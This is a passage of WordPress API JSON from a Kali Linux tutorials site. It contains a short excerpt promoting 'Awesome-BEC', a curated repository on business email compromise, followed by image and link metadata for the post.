business email compromise (BEC) remains a persistent and costly threat. This article explores Awesome-BEC, a curated repository of invaluable attack and defensive information, tools, and research dedicated to combating BEC attacks. Discover the wealth of\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFs0qjA7Sg-PMvScoWTDuAWmHL_hlhRggQ1Szz4rKosfuyAM-Ns00EPf1FOFpx20fXS8nx7j5Y2tcw7PqZPOpdcx4oxB9F2JG5Ca1AWS9kA2sgmm6hC8qZs10ZnP0tRUeef65aO-LtngTWgPpj8WIDqG8GZZlBC4C3Hn3sz_SfZuHdJbxjpUX7yjDbmA\/s16000\/BEC.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFs0qjA7Sg-PMvScoWTDuAWmHL_hlhRggQ1Szz4rKosfuyAM-Ns00EPf1FOFpx20fXS8nx7j5Y2tcw7PqZPOpdcx4oxB9F2JG5Ca1AWS9kA2sgmm6hC8qZs10ZnP0tRUeef65aO-LtngTWgPpj8WIDqG8GZZlBC4C3Hn3sz_SfZuHdJbxjpUX7yjDbmA\/s16000\/BEC.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFs0qjA7Sg-PMvScoWTDuAWmHL_hlhRggQ1Szz4rKosfuyAM-Ns00EPf1FOFpx20fXS8nx7j5Y2tcw7PqZPOpdcx4oxB9F2JG5Ca1AWS9kA2sgmm6hC8qZs10ZnP0tRUeef65aO-LtngTWgPpj8WIDqG8GZZlBC4C3Hn3sz_SfZuHdJbxjpUX7yjDbmA\/s16000\/BEC.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFs0qjA7Sg-PMvScoWTDuAWmHL_hlhRggQ1Szz4rKosfuyAM-Ns00EPf1FOFpx20fXS8nx7j5Y2tcw7PqZPOpdcx4oxB9F2JG5Ca1AWS9kA2sgmm6hC8qZs10ZnP0tRUeef65aO-LtngTWgPpj8WIDqG8GZZlBC4C3Hn3sz_SfZuHdJbxjpUX7yjDbmA\/s16000\/BEC.webp?resize=700%2C400&ssl=1 2x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/1701","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=1701"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/1701\/revisions"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=1701"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=1701"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=1701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}